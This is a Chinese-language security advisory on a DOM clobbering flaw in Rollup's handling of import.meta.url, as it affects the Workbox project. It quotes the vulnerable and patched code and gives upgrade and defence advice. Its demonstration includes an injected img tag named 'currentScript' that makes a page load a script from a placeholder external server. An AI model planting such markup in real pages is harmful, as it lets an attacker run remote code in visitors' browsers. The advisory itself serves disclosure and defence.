Workbox项目中Rollup依赖的DOM安全问题分析与修复方案

问题背景

在Web开发领域，构建工具的安全性问题往往容易被开发者忽视。近期在Workbox项目依赖的Rollup构建工具中发现了一个值得警惕的安全问题——DOM干扰攻击向量。这种攻击方式通过HTML元素的命名属性干扰JavaScript的正常执行流程，可能导致严重的安全风险。

问题技术分析

DOM干扰攻击原理

DOM干扰是一种特殊的代码重用攻击技术。攻击者通过在网页中嵌入看似无害的非脚本HTML标记（如带有特定name或id属性的img标签），利用现有JavaScript代码中的"可被利用的代码片段"将其转化为可执行代码。这种攻击不需要直接注入JavaScript代码，因此能绕过许多传统的内容安全策略。

Rollup中的问题点

当使用Rollup打包使用import.meta.url的脚本，并输出为cjs/umd/iife格式时，Rollup会将meta属性替换为从document.currentScript获取的URL。问题在于，document.currentScript的查找过程可能被攻击者通过浏览器命名DOM树元素访问机制所劫持。

具体来说，Rollup在以下代码中存在安全隐患：

// 原始问题代码
var _documentCurrentScript = typeof document !== 'undefined' ? document.currentScript : null;
s.src = (_documentCurrentScript && _documentCurrentScript.src || new URL('bundle.js', document.baseURI).href)

攻击者只需在页面中插入一个带有name="currentScript"属性的HTML元素（如img标签），就能控制脚本加载行为。

攻击场景演示

假设开发者使用Rollup打包以下代码：

var s = document.createElement('script');
s.src = import.meta.url + 'extra.js';
document.head.append(s);

打包后的输出包含易受攻击的代码。如果攻击者能在页面中插入：

<img name="currentScript" src="https://外部服务器/">

这将导致浏览器从外部控制的服务器加载extra.js脚本，实现潜在攻击。

问题影响范围

该问题影响以下情况：

1. 使用Rollup打包的项目
2. 输出格式为cjs/iife/umd
3. 代码中使用import.meta特性
4. 页面允许用户注入特定HTML标签且未严格过滤name/id属性

修复方案

Rollup团队已发布修复版本，通过在获取currentScript时增加类型检查来防御DOM干扰攻击。修复后的关键代码如下：

// 修复后的安全代码
document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT' && document.currentScript.src

修复方案增加了对元素类型的严格验证，确保只有真正的SCRIPT元素才能提供src属性值。

升级建议

开发者应立即采取以下措施：

1. 将Rollup升级至安全版本（v4.22.4+或v3.29.5+）
2. 对于无法立即升级的项目，可使用npm audit fix或package.json中的overrides功能强制使用安全版本
3. 审查项目中是否存在允许用户注入HTML标签的功能，并加强输入过滤

防御深度思考

除了升级Rollup外，开发者还应考虑以下防御措施：

1. 实施严格的内容安全策略(CSP)
2. 对所有用户提供的内容进行HTML净化处理
3. 避免在关键安全逻辑中依赖可能被DOM干扰影响的全局对象
4. 考虑使用Trusted Types等现代浏览器安全特性

这个案例再次提醒我们，构建工具链的安全性与应用代码安全同等重要，应当纳入常规的安全审计范围。